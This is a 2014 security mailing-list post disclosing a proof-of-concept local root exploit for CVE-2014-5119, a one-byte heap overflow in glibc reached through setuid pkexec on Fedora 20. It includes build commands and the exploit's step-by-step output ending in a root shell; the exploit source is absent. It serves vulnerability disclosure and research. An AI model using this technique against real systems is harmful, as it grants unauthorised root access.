Date: Mon, 25 Aug 2014 19:00:15 -0700 From: Tavis Ormandy <taviso@...gle.com> To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com Subject: CVE-2014-5119 glibc __gconv_translit_find() exploit List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte heap metadata overflow in the glibc internal routine __gconv_translit_find(). This is caused by the file extension being incorrectly appended to the transliteration module filename. The result is one too few bytes are allocated, and a single nul byte is written out of bounds. This issue affects real programs, that are typically default installed and setuid root. Despite explaining that my research suggests this is exploitable, it appears there has been general skepticism that single-fixed-byte overflows are still exploitable with modern allocator metadata hardening. As a result, the issue has been largely dismissed and downgraded in severity. As little progress has been made in resolving the issue thus far, we're publishing a proof of concept today. This exploit is specific to Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation on other systems and platforms is possible. This issue is complex, and fiendishly difficult to exploit. Thanks to Chris Evans for his heap expertise and insight. Some more information is available on our team blog. http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html $ make clean rm -f pkexploit pty *.o a.out *.so [taviso@...alhost glibc]$ make cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pkexploit.c -o pkexploit cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pty.c -o pty cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c -o exploit.o exploit.c cc exploit.o -fPIC -shared -o exploit.so Execute pkexploit to attempt exploitation. [taviso@...alhost glibc]$ ./pkexploit [*] --------------------------------------------------- [*] CVE-2014-5119 glibc __gconv_translit_find() exploit [*] ------------------------ taviso & scarybeasts ----- [*] Attempting to invoke pseudo-pty helper (this will take a few seconds)... [*] Read 7295 bytes of output from pseudo-pty helper, parsing... [*] pseudo-pty helper succeeded [*] attempting to parse libc fatal error message... [*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658 [*] attempting to parse the libc maps dump... [*] found libc.so mapped @0x40215000 [*] expecting libc.so bss to begin at 0x406c7000 [*] successfully located first morecore chunk w/tag @0x407d6000 [*] allocating space for argument structure... [*] creating command string... [*] creating a tls_dtor_list node... [*] open_translit() symbol will be at 0x40238320 [*] offsetof(struct known_trans, fname) => 32 [*] appending `./exploit.so` to list node [*] building parameter list... [*] anticipating tls_dtor_list to be at 0x406c82d4 [*] execvpe(pkexec...)... Error accessing / : File name too long uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 sh-4.2# exit exit [ CONTENT OF TYPE text/html SKIPPED ] [ CONTENT OF TYPE application/x-gzip SKIPPED ]
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ